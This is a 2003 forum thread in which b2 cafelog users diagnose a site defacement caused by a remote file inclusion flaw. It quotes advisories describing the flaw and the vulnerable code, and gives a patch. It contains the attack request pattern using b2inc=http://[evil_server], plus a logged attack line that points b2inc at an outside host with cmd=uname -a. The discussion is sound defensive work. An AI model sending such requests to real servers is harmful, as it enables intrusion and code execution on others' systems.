| View previous topic :: View next topic |
| Author |
Message |
dtdgoomba
Joined: 05 Aug 2002
Posts: 179
Location: Cambridge, MA
|
 Posted: Sun Jun 01, 2003 9:16 pm Post subject: Vulnerabilities? |
 |
|
My server was just hacked big time and I'm working on getting thigns back to normal. all our sites were defaced and I wanted to know if anyone knows anything about this? I found the team that defaced our sites, found this website:
http://zone-h.org/en/advisories
that has a list of hackers and all sites that teams defaced... it was posted yesterday...
b2 cafelog Execution of Arbitrary Code
05/31/2003
A vulnerability has been identified in b2 cafelog allowing malicious people to execute arbitrary PHP code on the web server. The problem is that the "b2inc" parameter isn't verfied in the "blogger-2-b2.php" script. By requesting "blogger-2-b2.php?b2inc=http://[evil_server]", it is possible to include a malicious "b2functions.php" and "b2vars.php" PHP script from "http://[evil_server]". A similar issue exists in "gm-2-b2.php" in the "b2inc" parameter. This has been reported in version 0.6.1 Solution: Edit the source code to verify input or restrict access to the scripts using .htaccess or similar.
_________________
Goombalooza! | Last X posts from Y Category | Login Box |
|
| Back to top |
|
 |
Candle
Joined: 23 Dec 2002
Posts: 547
|
|
| Back to top |
|
|
dtdgoomba
Joined: 05 Aug 2002
Posts: 179
Location: Cambridge, MA
|
| Posted: Mon Jun 02, 2003 12:10 am Post subject: |
|
|
Thanks Candle, been out of the forums here for a long friggin time and was flippin out when our server was hacked.. I deleted all those files. Thanks.
_________________
Goombalooza! | Last X posts from Y Category | Login Box |
|
| Back to top |
|
|
Candle
Joined: 23 Dec 2002
Posts: 547
|
| Posted: Mon Jun 02, 2003 1:36 am Post subject: ,,,, |
|
|
Hey no problem , I just wonder how many out there don't know about it ?
Sorry about your site ,, hope you had back ups so can get it all going again .
_________________
My Game Forum
 |
|
| Back to top |
|
|
dtdgoomba
Joined: 05 Aug 2002
Posts: 179
Location: Cambridge, MA
|
| Posted: Mon Jun 02, 2003 2:11 am Post subject: |
|
|
Yep, we're recovering from it now and got most of it back up, it was TechTeam and they defaced all the homepages. I'm trying to find out if they used b2 or something else to get root access so I've been looking for vulnerable files of ours... fun sunday activity, damn hackers....
i used to 'live' in this forum, so i needs some catchin up, hope all is well in b2 land
_________________
Goombalooza! | Last X posts from Y Category | Login Box |
|
| Back to top |
|
|
dtdgoomba
Joined: 05 Aug 2002
Posts: 179
Location: Cambridge, MA
|
| Posted: Mon Jun 02, 2003 3:43 am Post subject: |
|
|
I highly hightly recommend everyone fix their b2 with what was posted above (the link)... I have found that the hacker got in through my b2 weblog to all the sites.... very little damage though, mainly defacing, which is childish and lame, but at least nothing awful... thank god for backups!! all is well, so it proves our hosting isn't bad.. just my lack of keeping up with fixes for my personal stuff
_________________
Goombalooza! | Last X posts from Y Category | Login Box |
|
| Back to top |
|
|
Mister44
Joined: 31 Oct 2002
Posts: 237
Location: Philadelphia, PA, USA
|
| Posted: Mon Jun 02, 2003 5:58 pm Post subject: |
|
|
| How did you confirm that was the penetration vector? |
|
| Back to top |
|
|
TS.
Joined: 25 Jan 2002
Posts: 11
Location: London
|
| Posted: Mon Jun 02, 2003 8:09 pm Post subject: |
|
|
The best way would be to look at your webserver logs looking for hits on:
blogger-2-b2.php & gm-2-b2.php, then as the advisory says you'll see
blogger-2-b2.php?b2inc=http://[evil_server]
Here's hoping your blog is secured.
TS. |
|
| Back to top |
|
|
dtdgoomba
Joined: 05 Aug 2002
Posts: 179
Location: Cambridge, MA
|
| Posted: Mon Jun 02, 2003 11:26 pm Post subject: |
|
|
I was going through my access logs (and the person tried to delete them), but I saw they had created a file called mad.php in my b2-tools directory where those 2 files are located in the advisory. I'm still trying to track down the query that started it all but I was like "crap" knowing it was my fault. I deleted all instances of those 2 files from my blog and all the other b2 ones I have. Kinda sucked but it was taken care of. All references point to Brazil. Just annoying that it's a kiddie thing. I wouldn't mind someone leaving a .poop file somewhere and explaining what is vulnerable, you know?
_________________
Goombalooza! | Last X posts from Y Category | Login Box |
|
| Back to top |
|
|
Mister44
Joined: 31 Oct 2002
Posts: 237
Location: Philadelphia, PA, USA
|
| Posted: Tue Jun 03, 2003 12:32 am Post subject: |
|
|
| Code: | | 200.158.210.243 - - [01/Jun/2003:12:44:59 -0400] "GET /b2-tools/gm-2-b2.php?b2inc=http://www.madsk8er.hpg.com.br&cmd=uname%20-a HTTP/1.1" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" |
Look familiar? It's curious that they'd be able to deface your sites but not delete the httpd access logs... Awh well. Best of luck on the restoration. |
|
| Back to top |
|
|
dtdgoomba
Joined: 05 Aug 2002
Posts: 179
Location: Cambridge, MA
|
| Posted: Tue Jun 03, 2003 1:56 am Post subject: |
|
|
Definitely somewhat familiar, I was looking for that actual piece in my logs, but they must have destroyed the pieces before that, and then did mad.php, but that's pretty much the same thing. they also spelled their access_log as acess_log so ... but yet, we're shifting drives and zeroing out the compromised drive tonight, but we restored all files from backup. What a pain.. so wait, were you hit as well, or just that someone tried to attack you that way and it's present. I"m guessing the latter...
_________________
Goombalooza! | Last X posts from Y Category | Login Box |
|
| Back to top |
|
|
Mister44
Joined: 31 Oct 2002
Posts: 237
Location: Philadelphia, PA, USA
|
| Posted: Tue Jun 03, 2003 2:17 am Post subject: |
|
|
Notice the 404?
The files never existed in my primary journal (or any of the sites I host) and the folder that contains them in the DevBlog has an .htaccess file that forces them to be treated as plain-text.
The script kiddies seem to have done a google search for b2 installs and just fed the results to an attack script. |
|
| Back to top |
|
|
dtdgoomba
Joined: 05 Aug 2002
Posts: 179
Location: Cambridge, MA
|
| Posted: Tue Jun 03, 2003 4:24 am Post subject: |
|
|
ah, i see, i skimmed when i first went through. yeah, i guess i learned my lesson of updating things huh? Glad to see those kiddies know how to get their kicks..
_________________
Goombalooza! | Last X posts from Y Category | Login Box |
|
| Back to top |
|
|
Mister44
Joined: 31 Oct 2002
Posts: 237
Location: Philadelphia, PA, USA
|
| Posted: Tue Jun 03, 2003 5:18 am Post subject: |
|
|
| Everyone gets hacked eventually. Consider it a painful but necessary rite of passage... |
|
| Back to top |
|
|
cjc
Joined: 24 Dec 2002
Posts: 146
Location: New York
|
| Posted: Tue Jun 03, 2003 11:59 pm Post subject: Out of the woodwork |
|
|
More vulnerabilities, related to the one that we've already seen. This was reported on bugtraq just recently.
| Quote: |
Products: b2 cafelog 0.6.1 with ljupdate
b2 cafelog 0.6.2 and prior
Author: FraMe ( frame at kernelpanik.org )
URL: http://www.kernelpanik.org
CONTENTS
1. Overview
2. Description.
3. Details.
4. Vendor Response
1. Overview.
b2 is a news/weblog tool written in php. b2 uses MySQL as backend system.
2. Description.
"b2 0.6.1 with ljupdate" allow remote command execution in
./b2-include/b2functions.php. A malicious user can inject an url in $b2inc,
and obtain command execution with web server privileges ( usually nobody ).
"b2 0.6.2 and prior" allow sql injection in ./blog.header.php. $posts isn´t
convert to integer, so we can inject a sql in this variable. In MySQL 4.x
UNION and subselects can be used to obtain privileges.
"b2 0.6.2 and prior" has a little flaw. Bored users can force server to read
a remote file using $b2inc in ./b2-include/b2menutop.php
3. Details
b2 0.6.1 with ljupdate.
from ./b2-include/b2functions.php:
=======================
<?php
(..)
require_once($b2inc."/lj_update.php");
?>
=======================
b2 0.6.2 and prior
from ./blog.header.php:
=======================
<?php
(..)
if ($posts)
$posts_per_page=$posts;
(..)
$limits = ' LIMIT '.$posts_per_page;
(..)
$request = " SELECT $distinct * FROM $tableposts WHERE 1=1".$where." ORDER
BY post_$orderby $limits";
(..)
$result = mysql_query($request);
?>
=======================
b2 0.6.2 and prior
from ./b2-include/b2menutop.php:
=======================
<?php
(..)
$menu = file($b2inc."/b2menutop.txt");
(..)
?>
4. Vendor Response
20-04-2003: Sent email to vendor.
31-05-2003: No response.
==============================
[ FraMe - frame at kernelpanik.org ]
[ URL - http://frame.lifefromthenet.com ]
[ Kernelpanik - http://www.kernelpanik.org ]
[ PGP KeyID - 0xFA81AC9C ]
==============================
|
The second one in blog.header.php can be fixed by replacing:
| Code: | if ($posts)
$posts_per_page=$posts; |
with:
| Code: | if ($posts && is_numeric($posts))
$posts_per_page=$posts; |
The other two shouldn't be a concern if register_globals is turned off.
Should this whole thread be shifted over to the general announcements, just so people are aware to do upgrades/code changes? |
|
| Back to top |
|
|
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
